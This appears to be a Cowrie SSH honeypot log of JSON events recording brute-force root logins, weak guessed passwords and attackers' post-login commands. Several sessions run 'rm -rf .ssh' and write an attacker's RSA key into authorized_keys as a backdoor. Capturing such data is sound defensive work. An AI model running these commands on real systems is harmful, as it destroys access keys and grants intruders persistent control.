cdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:33.415391Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:33.468121Z","src_ip":"209.141.53.124","session":"1f723855f6f2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:34.035813Z","src_ip":"209.141.53.124","session":"1f723855f6f2"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:34.184980Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:34.185798Z","src_ip":"209.141.53.124","session":"1f723855f6f2"}
{"eventid":"cowrie.login.success","username":"root","password":"123123aA","message":"login attempt [root/123123aA] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:34.343583Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38986,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9b59e4f676d","protocol":"ssh","message":"New connection: 212.227.235.229:38986 (1.2.3.4:22) [session: f9b59e4f676d]","sensor":"my-vps","timestamp":"2025-08-28T11:47:34.604191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:34.604912Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:34.811571Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:35.239151Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:47:35.239974Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:47:35.240887Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:35.473218Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678!","message":"login attempt [root/12345678!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:35.902353Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:35.954446Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:47:35.955323Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:47:36.187580Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:36.188577Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:36.332461Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:47:36.333249Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:47:36.334152Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.session.connect","src_ip":"186.10.27.2","src_port":60294,"dst_ip":"1.2.3.4","dst_port":22,"session":"72acb337a244","protocol":"ssh","message":"New connection: 186.10.27.2:60294 (1.2.3.4:22) [session: 72acb337a244]","sensor":"my-vps","timestamp":"2025-08-28T11:47:36.423301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:36.423955Z","src_ip":"186.10.27.2","session":"72acb337a244"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:36.562205Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:36.663974Z","src_ip":"186.10.27.2","session":"72acb337a244"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:37.033223Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:47:37.034047Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:47:37.243372Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:37.244556Z","src_ip":"212.227.235.229","session":"f9b59e4f676d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38990,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae28b72d25a2","protocol":"ssh","message":"New connection: 212.227.235.229:38990 (1.2.3.4:22) [session: ae28b72d25a2]","sensor":"my-vps","timestamp":"2025-08-28T11:47:37.451910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:37.452917Z","src_ip":"212.227.235.229","session":"ae28b72d25a2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:47:37.652168Z","src_ip":"186.10.27.2","session":"72acb337a244"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:37.660988Z","src_ip":"212.227.235.229","session":"ae28b72d25a2"}
{"eventid":"cowrie.session.connect","src_ip":"38.47.92.86","src_port":46760,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d3169f7f432","protocol":"ssh","message":"New connection: 38.47.92.86:46760 (1.2.3.4:22) [session: 3d3169f7f432]","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.284683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.285483Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41328,"dst_ip":"1.2.3.4","dst_port":22,"session":"476b528b7d4f","protocol":"ssh","message":"New connection: 212.227.125.160:41328 (1.2.3.4:22) [session: 476b528b7d4f]","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.294526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.295375Z","src_ip":"212.227.125.160","session":"476b528b7d4f"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.317522Z","src_ip":"212.227.125.160","session":"476b528b7d4f"}
{"eventid":"cowrie.login.success","username":"root","password":"261188","message":"login attempt [root/261188] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.391302Z","src_ip":"212.227.125.160","session":"476b528b7d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:38.453132Z","src_ip":"212.227.125.160","session":"476b528b7d4f"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.453807Z","src_ip":"212.227.125.160","session":"476b528b7d4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.460313Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.478093Z","src_ip":"212.227.125.160","session":"476b528b7d4f"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.479256Z","src_ip":"212.227.125.160","session":"476b528b7d4f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.533730Z","src_ip":"212.227.235.229","session":"ae28b72d25a2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:38.887469Z","src_ip":"186.10.27.2","session":"72acb337a244"}
{"eventid":"cowrie.session.connect","src_ip":"186.10.27.2","src_port":38902,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0913ceb0cca","protocol":"ssh","message":"New connection: 186.10.27.2:38902 (1.2.3.4:22) [session: b0913ceb0cca]","sensor":"my-vps","timestamp":"2025-08-28T11:47:39.125111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:39.130951Z","src_ip":"186.10.27.2","session":"b0913ceb0cca"}
{"eventid":"cowrie.login.success","username":"root","password":"123456xxx","message":"login attempt [root/123456xxx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:39.202409Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:39.380301Z","src_ip":"186.10.27.2","session":"b0913ceb0cca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37326,"dst_ip":"1.2.3.4","dst_port":22,"session":"84ef9bb54885","protocol":"ssh","message":"New connection: 212.227.125.160:37326 (1.2.3.4:22) [session: 84ef9bb54885]","sensor":"my-vps","timestamp":"2025-08-28T11:47:39.509017Z"}
